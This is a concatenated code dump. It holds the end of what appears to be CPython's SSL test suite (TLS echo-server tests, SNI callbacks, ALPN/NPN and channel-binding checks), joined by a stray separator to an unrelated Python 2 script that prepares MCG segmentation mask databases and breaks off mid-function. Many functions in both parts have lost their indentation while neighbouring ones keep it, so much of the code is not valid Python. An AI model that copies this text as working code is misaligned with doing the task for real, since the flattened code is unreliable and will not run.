context = ssl.create_default_context(cafile=CERTFILE)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
indata = "TEST MESSAGE of mixed case\n"
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
    def test_recv_send(self):
        """Test recv(), send() and friends.

        Exercises every send*/recv* variant against an echo server:
        stream-oriented methods must succeed, datagram-oriented ones
        (sendto/recvfrom*) must raise ValueError on an SSL socket.
        Finally checks read/recv edge cases (-1, 0) and that the
        *msg-family methods are entirely disallowed.
        """
        if support.verbose:
            sys.stdout.write("\n")
        server = ThreadedEchoServer(CERTFILE,
                                    certreqs=ssl.CERT_NONE,
                                    ssl_version=ssl.PROTOCOL_TLSv1,
                                    cacerts=CERTFILE,
                                    chatty=True,
                                    connectionchatty=False)
        with server:
            s = ssl.wrap_socket(socket.socket(),
                                server_side=False,
                                certfile=CERTFILE,
                                ca_certs=CERTFILE,
                                cert_reqs=ssl.CERT_NONE,
                                ssl_version=ssl.PROTOCOL_TLSv1)
            s.connect((HOST, server.port))
            # helper methods for standardising recv* method signatures
            def _recv_into():
                b = bytearray(b"\0"*100)
                count = s.recv_into(b)
                return b[:count]
            def _recvfrom_into():
                b = bytearray(b"\0"*100)
                count, addr = s.recvfrom_into(b)
                return b[:count]
            # (name, method, expect success?, *args, return value func)
            send_methods = [
                ('send', s.send, True, [], len),
                ('sendto', s.sendto, False, ["some.address"], len),
                ('sendall', s.sendall, True, [], lambda x: None),
            ]
            # (name, method, whether to expect success, *args)
            recv_methods = [
                ('recv', s.recv, True, []),
                ('recvfrom', s.recvfrom, False, ["some.address"]),
                ('recv_into', _recv_into, True, []),
                ('recvfrom_into', _recvfrom_into, False, []),
            ]
            # Unique per-method payload so misrouted echoes are detected.
            data_prefix = "PREFIX_"
            for (meth_name, send_meth, expect_success, args,
                 ret_val_meth) in send_methods:
                indata = (data_prefix + meth_name).encode('ascii')
                try:
                    ret = send_meth(indata, *args)
                    msg = "sending with {}".format(meth_name)
                    self.assertEqual(ret, ret_val_meth(indata), msg=msg)
                    outdata = s.read()
                    if outdata != indata.lower():
                        self.fail(
                            "While sending with <<{name:s}>> bad data "
                            "<<{outdata:r}>> ({nout:d}) received; "
                            "expected <<{indata:r}>> ({nin:d})\n".format(
                                name=meth_name, outdata=outdata[:20],
                                nout=len(outdata),
                                indata=indata[:20], nin=len(indata)
                            )
                        )
                except ValueError as e:
                    # ValueError is only acceptable for methods expected
                    # to fail, and its message must name the method.
                    if expect_success:
                        self.fail(
                            "Failed to send with method <<{name:s}>>; "
                            "expected to succeed.\n".format(name=meth_name)
                        )
                    if not str(e).startswith(meth_name):
                        self.fail(
                            "Method <<{name:s}>> failed with unexpected "
                            "exception message: {exp:s}\n".format(
                                name=meth_name, exp=e
                            )
                        )
            for meth_name, recv_meth, expect_success, args in recv_methods:
                indata = (data_prefix + meth_name).encode('ascii')
                try:
                    s.send(indata)
                    outdata = recv_meth(*args)
                    if outdata != indata.lower():
                        self.fail(
                            "While receiving with <<{name:s}>> bad data "
                            "<<{outdata:r}>> ({nout:d}) received; "
                            "expected <<{indata:r}>> ({nin:d})\n".format(
                                name=meth_name, outdata=outdata[:20],
                                nout=len(outdata),
                                indata=indata[:20], nin=len(indata)
                            )
                        )
                except ValueError as e:
                    if expect_success:
                        self.fail(
                            "Failed to receive with method <<{name:s}>>; "
                            "expected to succeed.\n".format(name=meth_name)
                        )
                    if not str(e).startswith(meth_name):
                        self.fail(
                            "Method <<{name:s}>> failed with unexpected "
                            "exception message: {exp:s}\n".format(
                                name=meth_name, exp=e
                            )
                        )
                    # consume data
                    s.read()
            data = b"data"
            # read(-1, buffer) is supported, even though read(-1) is not
            s.send(data)
            buffer = bytearray(len(data))
            self.assertEqual(s.read(-1, buffer), len(data))
            self.assertEqual(buffer, data)
            # recv/read(0) should return no data
            s.send(data)
            self.assertEqual(s.recv(0), b"")
            self.assertEqual(s.read(0), b"")
            self.assertEqual(s.read(), data)
            # Make sure sendmsg et al are disallowed to avoid
            # inadvertent disclosure of data and/or corruption
            # of the encrypted data stream
            self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
            self.assertRaises(NotImplementedError, s.recvmsg, 100)
            self.assertRaises(NotImplementedError,
                              s.recvmsg_into, bytearray(100))
            s.write(b"over\n")
            # Negative sizes (other than read(-1, buf) above) must raise.
            self.assertRaises(ValueError, s.recv, -1)
            self.assertRaises(ValueError, s.read, -1)
            s.close()
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
    def test_handshake_timeout(self):
        # Issue #5103: SSL handshake must respect the socket timeout
        server = socket.socket(socket.AF_INET)
        host = "127.0.0.1"
        port = support.bind_port(server)
        started = threading.Event()
        # Read (not written) by the closure below; set True in the outer
        # finally to stop the server loop.
        finish = False
        def serve():
            # Accept connections but never speak TLS, so every client
            # handshake attempt stalls until its timeout fires.
            server.listen()
            started.set()
            conns = []
            while not finish:
                r, w, e = select.select([server], [], [], 0.1)
                if server in r:
                    # Let the socket hang around rather than having
                    # it closed by garbage collection.
                    conns.append(server.accept()[0])
            for sock in conns:
                sock.close()
        t = threading.Thread(target=serve)
        t.start()
        started.wait()
        try:
            try:
                c = socket.socket(socket.AF_INET)
                c.settimeout(0.2)
                c.connect((host, port))
                # Will attempt handshake and time out
                self.assertRaisesRegex(socket.timeout, "timed out",
                                       ssl.wrap_socket, c)
            finally:
                c.close()
            try:
                c = socket.socket(socket.AF_INET)
                c = ssl.wrap_socket(c)
                c.settimeout(0.2)
                # Will attempt handshake and time out
                self.assertRaisesRegex(socket.timeout, "timed out",
                                       c.connect, (host, port))
            finally:
                c.close()
        finally:
            # Stop the server thread before closing the listening socket.
            finish = True
            t.join()
            server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.recv(1)
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), "TLSv1")
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
    @unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
                         "'tls-unique' channel binding not available")
    def test_tls_unique_channel_binding(self):
        """Test tls-unique channel binding.

        Connects twice and checks that (a) the binding data is sane and
        matches what the server sees, and (b) a fresh connection yields
        different binding data.
        """
        if support.verbose:
            sys.stdout.write("\n")
        server = ThreadedEchoServer(CERTFILE,
                                    certreqs=ssl.CERT_NONE,
                                    ssl_version=ssl.PROTOCOL_TLSv1,
                                    cacerts=CERTFILE,
                                    chatty=True,
                                    connectionchatty=False)
        with server:
            s = ssl.wrap_socket(socket.socket(),
                                server_side=False,
                                certfile=CERTFILE,
                                ca_certs=CERTFILE,
                                cert_reqs=ssl.CERT_NONE,
                                ssl_version=ssl.PROTOCOL_TLSv1)
            s.connect((HOST, server.port))
            # get the data
            cb_data = s.get_channel_binding("tls-unique")
            if support.verbose:
                sys.stdout.write(" got channel binding data: {0!r}\n"
                                 .format(cb_data))
            # check if it is sane
            self.assertIsNotNone(cb_data)
            self.assertEqual(len(cb_data), 12)  # True for TLSv1
            # and compare with the peers version
            s.write(b"CB tls-unique\n")
            # The echo server replies with repr() of its own binding data.
            peer_data_repr = s.read().strip()
            self.assertEqual(peer_data_repr,
                             repr(cb_data).encode("us-ascii"))
            s.close()
            # now, again
            s = ssl.wrap_socket(socket.socket(),
                                server_side=False,
                                certfile=CERTFILE,
                                ca_certs=CERTFILE,
                                cert_reqs=ssl.CERT_NONE,
                                ssl_version=ssl.PROTOCOL_TLSv1)
            s.connect((HOST, server.port))
            new_cb_data = s.get_channel_binding("tls-unique")
            if support.verbose:
                sys.stdout.write(" got another channel binding data: {0!r}\n"
                                 .format(new_cb_data))
            # is it really unique
            self.assertNotEqual(cb_data, new_cb_data)
            self.assertIsNotNone(cb_data)
            self.assertEqual(len(cb_data), 12)  # True for TLSv1
            s.write(b"CB tls-unique\n")
            peer_data_repr = s.read().strip()
            self.assertEqual(peer_data_repr,
                             repr(new_cb_data).encode("us-ascii"))
            s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_verify_locations(CERTFILE)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_alpn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers("RC4")
server_context.set_ciphers("AES:RC4")
stats = server_params_test(client_context, server_context)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
self.assertIn("RC4", name.split("-"))
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_main(verbose=False):
    """Run the test_ssl suite after environment sanity checks.

    With -v, prints OpenSSL/platform diagnostics first.  Verifies that
    every certificate fixture exists, then runs the test classes that
    apply to the current environment (network access, threading).
    """
    if support.verbose:
        import warnings
        plats = {
            'Linux': platform.linux_distribution,
            'Mac': platform.mac_ver,
            'Windows': platform.win32_ver,
        }
        with warnings.catch_warnings():
            warnings.filterwarnings(
                'ignore',
                # Raw strings: '\(' is an invalid escape sequence in a
                # plain str literal and warns on recent Pythons.
                r'dist\(\) and linux_distribution\(\) '
                r'functions are deprecated .*',
                PendingDeprecationWarning,
            )
            for name, func in plats.items():
                plat = func()
                if plat and plat[0]:
                    plat = '%s %r' % (name, plat)
                    break
            else:
                # No platform probe returned anything useful.
                plat = repr(platform.platform())
        print("test_ssl: testing with %r %r" %
            (ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
        print("          under %s" % plat)
        print("          HAS_SNI = %r" % ssl.HAS_SNI)
        print("          OP_ALL = 0x%8x" % ssl.OP_ALL)
        try:
            print("          OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
        except AttributeError:
            pass

    # Every certificate fixture must be present before any test runs.
    for filename in [
        CERTFILE, BYTES_CERTFILE,
        ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
        SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
        BADCERT, BADKEY, EMPTYCERT]:
        if not os.path.exists(filename):
            raise support.TestFailed("Can't read certificate file %r" % filename)

    tests = [
        ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
        SimpleBackgroundTests,
    ]
    # Optional test classes depend on the environment.
    if support.is_resource_enabled('network'):
        tests.append(NetworkedTests)
    if _have_threads:
        thread_info = support.threading_setup()
        if thread_info:
            tests.append(ThreadedTests)

    try:
        support.run_unittest(*tests)
    finally:
        if _have_threads:
            support.threading_cleanup(*thread_info)
if __name__ == "__main__":
    # Run the full test_ssl suite when executed as a script.
    test_main()
|
prepare_mcg_maskdb.py | # --------------------------------------------------------
# Multitask Network Cascade
# Written by Haozhi Qi
# Copyright (c) 2016, Haozhi Qi
# Licensed under The MIT License [see LICENSE for details]
# --------------------------------------------------------
# System modules
import argparse
import os
import cPickle
import numpy as np
import scipy.io as sio
import cv2
from multiprocessing import Process
import time
import PIL
# User-defined module
import _init_paths
from mnc_config import cfg
from utils.cython_bbox import bbox_overlaps
from transform.mask_transform import mask_overlap, intersect_mask
from datasets.pascal_voc_seg import PascalVOCSeg
def parse_args():
    """ Parse input arguments
    """
    arg_parser = argparse.ArgumentParser(description='Prepare MCG roidb')
    arg_parser.add_argument('--input', dest='input_dir', type=str,
                            default='data/MCG-raw/',
                            help='folder contain input mcg proposals')
    arg_parser.add_argument('--output', dest='output_dir', type=str,
                            required=True,
                            help='folder contain output roidb')
    arg_parser.add_argument('--gt_roi', dest='roidb', type=str,
                            default='data/cache/voc_2012_train_gt_roidb.pkl',
                            help='roidb')
    arg_parser.add_argument('--gt_mask', dest='maskdb', type=str,
                            default='data/cache/voc_2012_train_gt_maskdb.pkl',
                            help='maskdb')
    # NOTE(review): single-dash long option is inconsistent with the
    # others, but changing it to '--mask_sz' would break existing
    # command lines, so it is kept as-is.
    arg_parser.add_argument('-mask_sz', dest='mask_size', type=int,
                            default=21,
                            help='compressed mask resolution')
    arg_parser.add_argument('--top_k', dest='top_k', type=int,
                            default=-1,
                            help='number of generated proposal')
    arg_parser.add_argument('--db', dest='db_name', type=str,
                            default='train',
                            help='train or validation')
    # argparse applies type=int to the string default, yielding 1.
    arg_parser.add_argument('--para_job', dest='para_job', type=int,
                            default='1',
                            help='launch several process')
    return arg_parser.parse_args()
def process_roidb(file_start, file_end, db):
    """Convert raw MCG .mat proposals [file_start, file_end) into roidb caches.

    Relies on module-level globals assigned in __main__: file_list,
    input_dir, output_dir, mask_size, top_k and (for training)
    gt_roidbs/gt_maskdbs -- TODO confirm all are set before spawning.
    For db == 'val' only boxes/masks are saved; otherwise overlaps with
    the ground truth and mask regression targets are computed as well.
    """
    for cnt in xrange(file_start, file_end):
        f = file_list[cnt]
        full_file = os.path.join(input_dir, f)
        # One output .mat per image, keyed by the image name.
        output_cache = os.path.join(output_dir, f.split('.')[0] + '.mat')
        timer_tic = time.time()
        # Skip images already processed (allows resuming).
        if os.path.exists(output_cache):
            continue
        mcg_mat = sio.loadmat(full_file)
        mcg_mask_label = mcg_mat['labels']
        mcg_superpixels = mcg_mat['superpixels']
        num_proposal = len(mcg_mask_label)
        mcg_boxes = np.zeros((num_proposal, 4))
        mcg_masks = np.zeros((num_proposal, mask_size, mask_size), dtype=np.bool)
        for ind_proposal in xrange(num_proposal):
            label = mcg_mask_label[ind_proposal][0][0]
            # Binary mask: union of the superpixels listed for this proposal.
            proposal = np.in1d(mcg_superpixels, label).reshape(mcg_superpixels.shape)
            [r, c] = np.where(proposal == 1)
            # Tight bounding box around the proposal mask (x1, y1, x2, y2).
            y1 = np.min(r)
            x1 = np.min(c)
            y2 = np.max(r)
            x2 = np.max(c)
            box = np.array([x1, y1, x2, y2])
            # Crop to the box and compress to a mask_size x mask_size patch.
            proposal = proposal[y1:y2+1, x1:x2+1]
            proposal = cv2.resize(proposal.astype(np.float), (mask_size, mask_size), interpolation=cv2.INTER_NEAREST)
            mcg_masks[ind_proposal, :, :] = proposal
            mcg_boxes[ind_proposal, :] = box
        # Optionally keep only the top_k proposals (MCG outputs are ranked).
        if top_k != -1:
            mcg_boxes = mcg_boxes[:top_k, :]
            mcg_masks = mcg_masks[:top_k, :]
        if db == 'val':
            # if we prepare validation data, we only need its masks and boxes
            roidb = {
                'masks': (mcg_masks >= cfg.BINARIZE_THRESH).astype(bool),
                'boxes': mcg_boxes
            }
            sio.savemat(output_cache, roidb)
            use_time = time.time() - timer_tic
            print '%d/%d use time %f' % (cnt, len(file_list), use_time)
        else:
            # Otherwise we need to prepare other information like overlaps
            num_mcg = mcg_boxes.shape[0]
            gt_roidb = gt_roidbs[cnt]
            gt_maskdb = gt_maskdbs[cnt]
            gt_boxes = gt_roidb['boxes']
            gt_masks = gt_maskdb['gt_masks']
            gt_classes = gt_roidb['gt_classes']
            num_gt = gt_boxes.shape[0]
            # Ground-truth entries are prepended to the proposal list.
            num_all = num_gt + num_mcg
            # define output structure
            det_overlaps = np.zeros((num_all, 1))
            seg_overlaps = np.zeros((num_all, 1))
            seg_assignment = np.zeros((num_all, 1))
            mask_targets = np.zeros((num_all, mask_size, mask_size))
            # ------------------------------------------------------
            all_boxes = np.vstack((gt_boxes[:, :4], mcg_boxes)).astype(int)
            all_masks = np.zeros((num_all, mask_size, mask_size))
            for i in xrange(num_gt):
                all_masks[i, :, :] = (cv2.resize(gt_masks[i].astype(np.float),
                                                 (mask_size, mask_size)))
            assert all_masks[num_gt:, :, :].shape == mcg_masks.shape
            all_masks[num_gt:, :, :] = mcg_masks
            # record bounding box overlaps
            cur_overlap = bbox_overlaps(all_boxes.astype(np.float), gt_boxes.astype(np.float))
            # Each box is assigned to its best-overlapping ground truth;
            # boxes with zero overlap get assignment -1 (background).
            seg_assignment = cur_overlap.argmax(axis=1)
            det_overlaps = cur_overlap.max(axis=1)
            seg_assignment[det_overlaps == 0] = -1
            # record mask region overlaps
            seg_overlaps[:num_gt] = 1.0
            for i in xrange(num_gt, num_all):
                # Expand the compressed mask back to its box size before
                # comparing against the full-resolution ground-truth masks.
                cur_mask = cv2.resize(all_masks[i, :, :].astype(np.float),
                                      (all_boxes[i, 2] - all_boxes[i, 0] + 1,
                                       all_boxes[i, 3] - all_boxes[i, 1] + 1)) >= cfg.BINARIZE_THRESH
                for mask_ind in xrange(len(gt_masks)):
                    gt_mask = gt_masks[mask_ind]
                    gt_roi = gt_roidb['boxes'][mask_ind]
                    cur_ov = mask_overlap(all_boxes[i, :], gt_roi, cur_mask, gt_mask)
                    # Keep the best mask IoU over all ground-truth instances.
                    seg_overlaps[i] = max(seg_overlaps[i], cur_ov)
            output_label = np.zeros((num_all, 1))
            for i in xrange(num_all):
                if seg_assignment[i] == -1:
                    continue
                cur_ind = seg_assignment[i]
                output_label[i] = gt_classes[seg_assignment[i]]
                # Regression target: assigned GT mask clipped to this box.
                mask_targets[i, :, :] = intersect_mask(all_boxes[i, :], gt_roidb['boxes'][cur_ind], gt_masks[cur_ind])
